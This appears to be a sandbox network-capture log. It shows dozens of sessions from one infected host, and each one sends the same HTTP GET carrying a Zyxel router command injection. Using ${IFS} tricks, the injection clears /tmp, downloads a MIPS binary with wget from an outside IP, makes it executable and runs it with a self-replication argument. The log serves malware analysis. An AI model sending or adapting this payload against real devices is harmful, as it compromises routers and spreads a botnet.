                                              Jan 29, 2024 07:03:36.749646902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1154192.168.2.144020484.228.1.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.749682903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1155192.168.2.1440022137.203.47.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.749720097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1156192.168.2.1450600176.196.171.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.749757051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1157192.168.2.144519231.73.207.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.749795914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1158192.168.2.1436958118.250.201.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.749835968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1159192.168.2.143660832.116.249.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.749874115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1160192.168.2.1443088159.205.100.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.749927998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1161192.168.2.1443292119.135.69.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.749954939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1162192.168.2.1436376185.90.152.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.750010967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1163192.168.2.1443530121.3.88.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.750049114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1164192.168.2.14608849.252.8.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.750082970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1165192.168.2.143719489.105.114.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.750129938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1166192.168.2.143283852.46.145.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.750160933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1167192.168.2.1442756219.118.254.224443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.750215054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1168192.168.2.145610217.165.34.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.750255108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1169192.168.2.1457010204.188.150.12443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.750294924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1170192.168.2.1450156138.251.111.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.750334024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1171192.168.2.1453796120.84.178.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.750366926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1172192.168.2.145907227.50.205.38443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.750411034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1173192.168.2.145178498.101.23.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.750451088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1174192.168.2.1440264182.240.28.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.750482082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1175192.168.2.144950887.80.67.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.750519991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1176192.168.2.143805492.79.174.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.750576973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1177192.168.2.1442490102.183.2.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.750612020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1178192.168.2.1439944119.142.222.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.750647068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1179192.168.2.143296027.46.116.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.750682116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1180192.168.2.144063297.49.44.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.750710011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1181192.168.2.1442584155.105.40.186443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.750749111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1182192.168.2.144346088.47.154.71443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.750808001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1183192.168.2.145386073.205.243.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.750852108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1184192.168.2.143416475.116.168.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.750874043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1185192.168.2.1446078124.41.92.225443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.750921965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1186192.168.2.1449000142.26.24.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.750951052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1187192.168.2.1455590143.240.48.12443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.750978947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1188192.168.2.1456000141.214.222.17443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.751029015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1189192.168.2.1436564151.148.83.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.751090050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1190192.168.2.144758070.77.87.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.751131058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1191192.168.2.143453287.34.65.159443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.751154900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1192192.168.2.1452944212.66.43.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.751202106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1193192.168.2.145649481.248.141.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.751243114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1194192.168.2.1458126223.236.5.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.751296997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1195192.168.2.1435774114.118.239.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.751341105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1196192.168.2.1436740100.161.132.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.751363993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1197192.168.2.1433180218.138.111.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.751393080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1198192.168.2.1437022109.60.144.224443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.751429081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1199192.168.2.1455804216.129.35.214443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.751466036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1200192.168.2.14509001.44.42.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.751491070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1201192.168.2.144172440.67.167.174443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.751542091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1202192.168.2.1440744167.53.126.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.751570940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1203192.168.2.1443690213.71.62.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.751605034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1204192.168.2.145000474.254.103.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.751641989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1205192.168.2.1442560164.45.82.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.751701117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1206192.168.2.144206619.134.158.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.751739979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1207192.168.2.1441540195.246.164.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.751776934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1208192.168.2.145740899.39.234.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.751821041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1209192.168.2.1454560182.19.96.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.751862049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1210192.168.2.1452002191.104.214.242443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.751893044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1211192.168.2.1445722104.69.107.181443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.751935005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1212192.168.2.1442160106.4.162.59443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.751965046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1213192.168.2.1442316178.84.78.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.755083084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1214192.168.2.1444342130.122.29.37443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.755811930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1215192.168.2.144480871.189.141.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.755844116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1216192.168.2.1440946134.140.18.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.755916119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1217192.168.2.143599488.126.183.74443
                                              TimestampBytes transferredDirectionData
